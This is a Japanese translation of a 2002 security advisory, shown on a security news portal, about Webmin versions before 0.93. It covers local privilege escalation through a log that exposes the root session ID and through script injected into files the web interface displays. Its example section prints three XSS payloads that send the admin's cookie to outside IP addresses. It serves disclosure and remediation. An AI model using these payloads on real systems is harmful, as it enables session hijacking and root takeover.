Webmin のローカル権限拡大に関する問題 | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2017.10.24(火)

Webmin のローカル権限拡大に関する問題

国際 海外情報

[翻訳:関谷 麻美]
2002年3月22日

◆概要:
 Webmin は、UNIX のシステム管理者用 Web ベースのインターフェースだ。テーブルとフォーム(そして File Manager モジュール用の Java) をサポートするブラウザならどれでも、ユーザ・アカウント、Apache、DNS、ファイル共有などを設定できる。その製品に無数のセキュリティ上の脆弱性が発見された。それらの中で危険度の高い脆弱性(権限の拡大を許可する)を以下に挙げる。

◆詳細:
脆弱なシステム:
Webmin 0.93 より以前のバージョン

この問題の影響を受けないシステム:
Webmin バージョン 0.93

問題 #1:
 ( rpm によりインストールされた場合)Webmin のバージョン 0.92-1 は、/var/webmin ディレクトリ上にセキュリティ不備のある権限をそのまま残す。つまり、webmin 内のコマンド・ロギングが有効な場合、ローカル・ユーザは /var/webmin/webmin.log ファイルを読むことができ、そしてルート・ユーザ sid (クッキー・セッション id)を検索できる。そして、その session-id を使用して偽のローカル・クッキーを生成し、ルート権限として直接 webmin に記録することは比較的容易だ。

問題 #2:
 ある程度信用されている同僚がいくつかの Webmin 機能に制限つきアクセス権限(具体的には sendmail )を与えられた場合、悪意あるコードを特定のファイルに挿入することができる。結果、そのルート・ユーザが webmin の関連ページを訪れる際、そのファイルはルートの webmin sid(クッキー・セッション id)を露呈してしまう。

攻略手段の例:
 下記の行を virtusers ファイルに挿入し、ルート権限を持つユーザがそのページを訪れるのを待つ。
</tt></a></td><tt><td><script>/* */document.write('<imgsrc="http://192.168.40.1/'+document.cookie+'">');</script>

 もしくは下記の行を /etc/aliases ファイルに挿入する。
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:*/+zz+' src="http://10.1.1.33/'+document.cookie+'">');</script>
 しかし、webmin の_no_ access を持つ悪意あるローカルユーザはこの脆弱性を利用する危険性があり、そのユーザは webmin が HTML インターフェースを介して見るファイルを変更する恐れがある(但し、HTML インターフェースで読み取られるコードが HTML 用にチェックされない場合)。例えば、下記のようなスクリプトで /etc/passwd にあるそれらの'real name' を変更できるかもしれない。
<script>zz=unescape("%3A");document.write('<img src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>

 (但し、chfn はあなたにこの長さのユーザ名を指定させないが、そのアイディアを得ることができる)

 この問題は、webmin の大部分に存在し、ファイル(もしくは、'ps'のようなコマンド出力)が Web インターフェース内で読み取られ、そして表示される。

◆解決策:
 (いくつかの他の問題と同様に)それらの問題が修正されている Webmin の最新バージョン(0.93) にアップグレードすること。最新版は、下記の URL から入手できる。
http://www.webmin.com/download.html

◆追加情報:
 prophecy.net.nz のアドバイザリーがこの情報が提供した。

[情報提供:SecuriTeam]
http://www.securiteam.com/

《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

Scan BASIC 会員限定記事

もっと見る

Scan BASIC 会員限定記事特集をもっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)

もっと見る

[Web小説] サイバー探偵 工藤伸治の事件簿サーガ (シーズン 1~6 第1話)特集をもっと見る

カテゴリ別新着記事

国際 カテゴリの人気記事 MONTHLY ランキング

  1. 搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

    搾取される底辺サイバー犯罪者、無料配付トロイにはバックドア(The Register)

  2. WPA2の新たな脆弱性への攻撃KRACK、暗号化技術の根底にある欠陥(The Register)

    WPA2の新たな脆弱性への攻撃KRACK、暗号化技術の根底にある欠陥(The Register)

  3. セキュリティ人材の慢性不足、海外の取り組みは(The Register)

    セキュリティ人材の慢性不足、海外の取り組みは(The Register)

  4. SMSによる二要素認証が招くSOS(The Register)

  5. 「Tor 禁止令」を解く Facebook、暗号化の onion アクセスポイントを宣伝~これからは暗号化通信も完全に OK(The Register)

  6. フィッシング詐欺支援サービスの価格表(The Register)

  7. iCloudからの女優のプライベート画像流出事件、容疑者がフィッシングの罪を大筋で認める

  8. Mac OS X のシングルユーザモードの root アクセス(2)

  9. AWS 設定ミスでウォールストリートジャーナル購読者情報他 220 万件流出(The Register)

  10. 「過激派の」Tails や Tor を使っている? おめでとう、あなたは NSA のリストに載っている~Linux 情報サイトの読者や、プライバシーに関心を持つネット市民が標的にされているとの報告(The Register)

全カテゴリランキング

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×